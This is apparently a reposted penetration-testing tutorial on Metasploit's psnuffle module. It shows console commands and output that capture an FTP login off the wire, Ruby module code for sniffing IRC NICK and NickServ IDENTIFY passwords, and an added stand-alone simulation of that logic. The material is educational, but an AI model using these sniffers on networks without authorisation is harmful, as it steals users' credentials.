Metasploit Framework (MSF) with BackTrack 5
Author: WhySoSeriousssssssssssss
Posted: 22:50
The Metasploit Framework (MSF) is one of the most useful auditing tools freely available to security professionals today. From a wide array of commercial-grade exploits and an extensive exploit development environment, all the way to network information gathering tools and web vulnerability plugins, the Metasploit Framework provides a truly impressive work environment. The Metasploit Framework is far more than just a collection of exploits. It is an infrastructure that you can build upon and adapt to your own needs, which lets you concentrate on your unique environment instead of reinventing the wheel.




Password Sniffing

Max Moser released a Metasploit password sniffing module named psnuffle that will sniff passwords off the wire similar to the tool dsniff. It currently supports pop3, imap, ftp, and HTTP GET. You can read more about the module on Max's Blog at http://remote-exploit.blogspot.com/2009/08/psnuffle-password-sniffer-for.html


Using the psnuffle module is extremely simple. There are some options available but the module works great "out of the box".

msf > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > show options

Module options:

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
FILTER                      no        The filter string for capturing traffic
INTERFACE                   no        The name of the interface
PCAPFILE                    no        The name of the PCAP capture file to process
PROTOCOLS  all              yes       A comma-delimited list of protocols to sniff or "all".
RHOST                       yes       The target address
SNAPLEN    65535            yes       The number of bytes to capture
TIMEOUT    1                yes       The number of seconds to wait for new data


As you can see, the only mandatory option that requires your action is RHOST. Other options are available, including the ability to process a PCAP capture file instead of a live interface. The example below runs the scanner in its default mode.

msf auxiliary(psnuffle) > set RHOST 192.168.1.155
RHOST => 192.168.1.155
msf auxiliary(psnuffle) > run
[*] Auxiliary module running as background job
[*] Loaded protocol FTP from /pentest/exploits/framework3/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /pentest/exploits/framework3/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /pentest/exploits/framework3/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol URL from /pentest/exploits/framework3/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
[*] Successful FTP Login: 192.168.1.112:21-192.168.1.101:48614 >> dookie / dookie (220 3Com 3CDaemon FTP Server Version 2.0)

You've captured a successful FTP login. This is an excellent tool for passive information gathering.




Password Sniffing with Psnuffle

Psnuffle is easy to extend due to its modular design. This section walks through developing an IRC (Internet Relay Chat) protocol sniffer for Notify and Nick messages.


Module Location

All the protocol modules are located in data/exploits/psnuffle. Their file names correspond to the protocol names used inside psnuffle. To develop your own module, take a look at the important parts of the existing pop3 sniffer module and use it as a template.

Pattern definitions:

self.sigs = {
  :ok   => /^(\+OK[^\n]*)\n/si,
  :err  => /^(-ERR[^\n]*)\n/si,
  :user => /^USER\s+([^\n]+)\n/si,
  :pass => /^PASS\s+([^\n]+)\n/si,
  :quit => /^(QUIT\s*[^\n]*)\n/si }


This section defines the regular expression patterns used during sniffing to identify interesting data. Regular expressions look strange at first but are very powerful. In short, whatever is matched inside the capturing parentheses () becomes available in a variable later on in the script.

self.sigs = {
  :user => /^(NICK\s+[^\n]+)/si,
  :pass => /\b(IDENTIFY\s+[^\n]+)/si,}

For IRC this section would look like the one above. Not all NickServ services use IDENTIFY to receive the password, but the one on freenode does.


Session definition

For every module you first have to define what ports it should handle and how the session should be tracked.

return if not pkt[:tcp] # You don't want to handle anything other than TCP
return if (pkt[:tcp].src_port != 6667 and pkt[:tcp].dst_port != 6667) # Process only packets on port 6667

# Ensure that the session hash stays the same for both directions of communication
if (pkt[:tcp].dst_port == 6667) # When the packet is sent to the server
  s = find_session("#{pkt[:ip].dst_ip}:#{pkt[:tcp].dst_port}-#{pkt[:ip].src_ip}:#{pkt[:tcp].src_port}")
else # When the packet is coming from the server
  s = find_session("#{pkt[:ip].src_ip}:#{pkt[:tcp].src_port}-#{pkt[:ip].dst_ip}:#{pkt[:tcp].dst_port}")
end


Now that you have a session object that uniquely consolidates the conversation's data, you can go on and process packet content that matched one of the regular expressions defined earlier.

case matched
when :user # when the pattern "/^(NICK\s+[^\n]+)/si" matches the packet content
  s[:user] = matches # Store the name into the session hash s for later use
  # Do whatever you like here... maybe a puts if you need to
when :pass # When the pattern "/\b(IDENTIFY\s+[^\n]+)/si" matches
  s[:pass] = matches # Store the password into the session hash s as well
  if (s[:user] and s[:pass]) # When we have the name and the pass sniffed, print it
    print "-> IRC login sniffed: #{s[:session]} >> username:#{s[:user]} password:#{s[:pass]}\n"
  end
  sessions.delete(s[:session]) # Remove this session because we don't need to track it anymore
when nil
  # No matches, don't do anything
else # Just in case anything else is matching...
  sessions[s[:session]].merge!({matched => matches}) # Just add it to the session object
end
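The three pieces above (signature hash, direction-independent session key, and the case/when dispatch) are easiest to understand when they can be run end to end. The following is an added example written for this page, not code from the original post or from Metasploit: it simulates the psnuffle module logic over a few constructed IRC packets so it executes without Metasploit, a pcap file or a network interface. Packet, IrcSniffer, run_demo and the sample addresses and payloads are this example's own assumptions.

```ruby
# Added example (not psnuffle itself): stand-alone simulation of the
# IRC module logic described above, run over constructed packets.

IRC_PORT = 6667

# Same shape as psnuffle's self.sigs. The /s suffix on the page's patterns
# is a legacy encoding option in modern Ruby, so only /i is kept here.
IRC_SIGS = {
  :user => /^(NICK\s+[^\n]+)/i,
  :pass => /\b(IDENTIFY\s+[^\n]+)/i,
}

# Minimal stand-in for the pkt[:ip] / pkt[:tcp] fields psnuffle reads.
Packet = Struct.new(:src_ip, :src_port, :dst_ip, :dst_port, :payload)

class IrcSniffer
  attr_reader :sessions, :findings

  def initialize
    @sessions = {}   # session key => fields captured so far
    @findings = []   # completed logins, returned for the caller to report on
  end

  # Builds the key exactly as the module does: "server:port-client:port"
  # whichever way the packet is travelling, so both directions of one
  # conversation resolve to the same session hash.
  def session_key(pkt)
    if pkt.dst_port == IRC_PORT
      "#{pkt.dst_ip}:#{pkt.dst_port}-#{pkt.src_ip}:#{pkt.src_port}"
    else
      "#{pkt.src_ip}:#{pkt.src_port}-#{pkt.dst_ip}:#{pkt.dst_port}"
    end
  end

  def find_session(key)
    @sessions[key] ||= { :session => key }
  end

  # Returns [name, capture] for the first signature that matches, or
  # [nil, nil]; the capture is the contents of the first () group.
  def match_sigs(payload)
    IRC_SIGS.each do |name, regex|
      m = regex.match(payload)
      return [name, m[1].strip] if m
    end
    [nil, nil]
  end

  def process(pkt)
    return if pkt.src_port != IRC_PORT && pkt.dst_port != IRC_PORT
    matched, matches = match_sigs(pkt.payload)
    s = find_session(session_key(pkt))
    case matched
    when :user
      s[:user] = matches
    when :pass
      s[:pass] = matches
      if s[:user] && s[:pass]
        @findings << "#{s[:session]} >> username:#{s[:user]} password:#{s[:pass]}"
      end
      @sessions.delete(s[:session])   # conversation fully seen; stop tracking it
    when nil
      # no signature matched (e.g. server NOTICE lines); nothing to record
    else
      s[matched] = matches            # any other signature: keep it in the session
    end
  end
end

# Constructed sample traffic: one client registering a nick and then
# identifying to NickServ, interleaved with a server line and an unrelated
# HTTP packet that the port check must discard.
SAMPLE_PACKETS = [
  Packet.new("192.168.1.101", 51000, "192.168.1.50", IRC_PORT, "NICK alice\r\n"),
  Packet.new("192.168.1.50", IRC_PORT, "192.168.1.101", 51000,
             ":irc.example.test NOTICE alice :*** Looking up your hostname\r\n"),
  Packet.new("192.168.1.101", 51001, "192.168.1.60", 80, "GET / HTTP/1.1\r\n"),
  Packet.new("192.168.1.101", 51000, "192.168.1.50", IRC_PORT,
             "PRIVMSG NickServ :IDENTIFY hunter2\r\n"),
]

# Feeds the sample packets through a fresh sniffer and returns it.
def run_demo
  sniffer = IrcSniffer.new
  SAMPLE_PACKETS.each { |pkt| sniffer.process(pkt) }
  sniffer
end

if __FILE__ == $0
  run_demo.findings.each { |f| puts "-> IRC login sniffed: #{f}" }
end
```

Because the capture group in both patterns includes the command keyword, the recorded values read "NICK alice" and "IDENTIFY hunter2", exactly as the page's module would store them; narrowing the parentheses to the argument alone is the one-line change if only the bare values are wanted. The session is removed as soon as the IDENTIFY line is seen, so a long-lived IRC connection does not keep a stale entry in the sessions hash.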
